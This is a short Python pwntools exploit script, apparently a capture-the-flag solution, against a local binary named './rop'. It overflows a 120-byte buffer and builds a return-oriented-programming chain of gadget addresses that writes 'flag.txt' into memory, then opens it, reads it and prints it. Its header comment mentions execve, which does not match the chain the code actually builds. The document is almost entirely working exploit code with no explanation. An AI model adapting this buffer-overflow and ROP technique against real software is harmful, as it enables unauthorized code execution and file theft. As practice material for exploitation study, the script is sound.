#!/usr/bin/env python3
# execve generated by ROPgadget

from struct import pack
from pwn import *

r = process('./rop')
gdb.attach(r)
# Padding goes here
p = b'a'*120

p += p64(0x00000000004006a6) # pop rdi ; ret
p += p64(0x00000000006d60e0) # data
p += p64(0x00000000004589a5) # pop rdx ; ret
p += b'flag.txt'
p += p64(0x0000000000444723) # mov qword ptr [rdi], rdx ; ret

p += p64(0x00000000004006a6) # pop rdi ; ret
p += p64(0x00000000006d60e8) # data
p += p64(0x00000000004589a5) # pop rdx ; ret
p += p64(0)
p += p64(0x0000000000444723) # mov qword ptr [rdi], rdx ; ret

p += p64(0x000000000040161c) # pop rsi ; ret
p += p64(0)
p += p64(0x00000000004006a6) # pop rdi ; ret
p += p64(0x00000000006d60e0) # data
p += p64(0x4587d0) # open

p += p64(0x00000000004006a6) # pop rdi ; ret
p += p64(3)
p += p64(0x000000000040161c) # pop rsi ; ret
p += p64(0x00000000006d60e0) # data
p += p64(0x00000000004589a5) # pop rdx ; ret
p += p64(100)
p += p64(0x458990) #read
p += p64(0x00000000004006a6) # pop rdi ; ret
p += p64(0x00000000006d60e0)
p += p64(0x41f8d0)

r.sendline(p)
r.interactive()
